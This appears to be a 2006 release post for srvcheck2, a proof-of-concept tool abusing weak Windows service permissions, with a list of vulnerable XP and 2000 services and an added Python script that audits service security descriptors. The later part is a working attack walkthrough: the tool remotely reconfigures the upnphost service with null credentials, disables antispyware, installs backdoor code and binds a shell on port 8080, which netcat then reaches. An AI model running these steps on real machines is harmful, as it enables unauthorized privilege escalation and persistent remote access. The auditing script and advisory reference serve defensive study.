Proof of concept for the paper by Sudhakar Govindavajhala and Andrew Appel (<a href="http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf">http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf</a>).
Running as an unprivileged user, you can test whether your services have weak permissions that would let that user reconfigure them and install a backdoor.
Both source code and binary are included.<br>
<b>Microsoft advisory: <a href="http://microsoft.com/technet/security/advisory/914457.mspx">http://microsoft.com/technet/security/advisory/914457.mspx</a></b><br>
<br>
<b>SrvCheck v2.0 can also perform these checks remotely, for example using domain user credentials.</b><br>
<br>
<b>Here is a short list of known vulnerable services under XP SP2, by the group that can reconfigure them (the account the service runs as is in parentheses):</b><br>
<br>
<b>- Advanced User: </b><br>
Service: DcomLaunch ( SYSTEM )<br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV ( Local Service )<br>
<b>- User: </b><br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV ( Local Service )<br>
<b>- Network Config Operators:</b><br>
Service: DcomLaunch ( SYSTEM )<br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV ( Local Service )<br>
Service: DHCP ( SYSTEM )<br>
Service: NetBT ( SYSTEM - .sys driver )<br>
Service: DnsCache ( SYSTEM )<br>
<br>
<b>Windows 2000 Professional SP4:</b><br>
<br>
<b>- Power User: </b><br>
Service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM )<br>
<br>
<b>Third-party software:</b><br>
<br>
HP: "Pml Driver HPZ12"<br>
Autodesk: "Autodesk Licensing Service" - possibly the same issue as <a href="http://securityfocus.com/bid/16472">http://securityfocus.com/bid/16472</a><br>
<br>
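The check that the -l mode performs can also be done by hand on a service's security descriptor. The following is an added example, not srvcheck code or part of this post: it parses a service DACL in the SDDL form that <code>sc sdshow &lt;service&gt;</code> prints and flags allow-ACEs that give a low-privileged group SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER. The two descriptors in it are constructed, modelled on a default one and on the Users / Network Config Operators case listed above.<br>

```python
"""Audit a service security descriptor (SDDL, as printed by `sc sdshow <svc>`)
for ACEs that let a low-privileged group rewrite the service configuration.
Added example, not srvcheck code; the SDDL strings below are constructed."""
import re

# SDDL rights that allow taking over a service: DC is the service-specific bit
# SERVICE_CHANGE_CONFIG (0x2), WD/WO rewrite the DACL or owner, GA/GW are generic
DANGEROUS_RIGHTS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC",
                    "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# Well-known SDDL trustee abbreviations for groups that should never hold those rights
LOW_PRIV_TRUSTEES = {"BU": "Users", "AU": "Authenticated Users", "WD": "Everyone",
                     "IU": "Interactive", "PU": "Power Users", "AN": "Anonymous",
                     "NO": "Network Configuration Operators"}

def parse_dacl(sddl):
    """Return (ace_type, [right codes], trustee) for every ACE in the D: component."""
    match = re.search(r"D:([^:]*)", sddl)        # DACL runs until the next component
    aces = []
    for body in re.findall(r"\(([^)]*)\)", match.group(1) if match else ""):
        fields = body.split(";")                 # type;flags;rights;objguid;inhguid;sid
        if len(fields) < 6:
            continue
        rights = fields[2]
        # rights are a run of two-letter codes or a raw hex mask (kept as one token)
        codes = [rights] if rights.startswith("0x") else re.findall(r"[A-Z]{2}", rights)
        aces.append((fields[0], codes, fields[5]))
    return aces

def weak_aces(sddl):
    """List (group, [dangerous rights]) for allow-ACEs granted to low-privileged groups."""
    findings = []
    for ace_type, codes, trustee in parse_dacl(sddl):
        if ace_type != "A" or trustee not in LOW_PRIV_TRUSTEES:
            continue
        hits = [DANGEROUS_RIGHTS[c] for c in codes if c in DANGEROUS_RIGHTS]
        if hits:
            findings.append((LOW_PRIV_TRUSTEES[trustee], hits))
    return findings

# Constructed: a default-style descriptor where only Administrators (BA) hold DC
SAFE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
# Constructed: the weak shape described above for upnphost/SSDPSRV, where Users (BU)
# and Network Configuration Operators (NO) also hold DC (SERVICE_CHANGE_CONFIG)
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;BU)(A;;CCDCLCSWRPLOCRRC;;;NO)")

if __name__ == "__main__":
    for name, sddl in (("safe", SAFE_SDDL), ("weak", WEAK_SDDL)):
        print(name, weak_aces(sddl) or "no weak ACEs")
```

A descriptor that gets flagged here is the one to tighten with the vendor patch or, failing that, by removing the DC right from the offending group's ACE.<br>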
<br>
D:\Programación\srvcheck2>srvcheck2.exe -?<br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com">atarasco@gmail.com</a><br>
<br>
Usage:<br>
-l list vulnerable services<br>
-m <service> modify the configuration for that service<br>
-c <command> Command to execute throw remote service<br>
by default. bindshell application will be used<br>
-H <Host> specify a remote host to connect ip/netbiosname)<br>
-u <user> if not seletected Default logon credentials used)<br>
-p <password> if not used Default logon credentials used)<br>
-? Extended information with samples<br>
examples:<br>
srvcheck.exe -l (list local vulnerabilities)<br>
srvcheck.exe -m service (spawn a shell at port 8080)<br>
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"<br>
srvcheck -l -H host (list remote vulnerabilities)<br>
<br>
D:\Programación\srvcheck2>srvcheck2.exe -l -H 192.168.0.1<br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com">atarasco@gmail.com</a><br>
<br>
[+] Trying to connect to remote SCM<br>
[+] Host: \\192.168.0.1\IPC$<br>
[+] Username: (null)<br>
[+] Password: (null)<br>
[+] Network Connection OK<br>
[+] Listing Vulnerable Services...<br>
<br>
[Dhcp] Cliente DHCP<br>
Status: 0x4<br>
Parameter: C:\WINDOWS\System32\svchost.exe -k netsvcs<br>
<br>
[Dnscache] Cliente DNS<br>
Status: 0x4<br>
Parameter: C:\WINDOWS\System32\svchost.exe -k NetworkService<br>
<br>
[NetBT] NetBios a través de Tcpip<br>
Status: 0x4<br>
Parameter: System32\DRIVERS\netbt.sys<br>
<br>
[SSDPSRV] Servicio de descubrimientos SSDP<br>
Status: 0x1<br>
Parameter: C:\WINDOWS\System32\svchost.exe -k LocalService<br>
<br>
[upnphost] Host de dispositivo Plug and Play universal<br>
Status: 0x1<br>
Parameter: C:\WINDOWS\System32\svchost.exe <br>
<br>
[+] Analyzed 311 Services in your system<br>
[+] You were Lucky. 5 vulnerable services found<br>
<br>
D:\Programación\srvcheck2>srvcheck2.exe -H 192.168.0.1 -m upnphost<br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com">atarasco@gmail.com</a><br>
<br>
[+] Trying to connect to remote SCM<br>
[+] Host: \\192.168.0.1\IPC$<br>
[+] Username: (null)<br>
[+] Password: (null)<br>
[+] Network Connection OK<br>
[+] Uninstalling previous backdoors<br>
[+] Granting Remote bindshell Execution..<br>
[+] Shutting down remote antispyware Service =)<br>
[+] Installing Backdoor Code...<br>
[+] The service have been succesfully modified =)<br>
[+] Service Opened. Trying to Start... (wait a few seconds)<br>
[+] StarteService() Error due to a non service application execution<br>
[+] Ignore it. Your application should be executed =)<br>
[+] Now connect to port 8080 and enjoy your new privileges<br>
<br>
D:\Programación\srvcheck2>nc localhost 8080<br>
Microsoft Windows XP [Versión 5.1.2600]<br>
(C) Copyright 1985-2001 Microsoft Corp.<br>
<br>
C:\WINDOWS\system32><br>
<br>
regards,<br>
<br>
Andres Tarasco<br>
<br>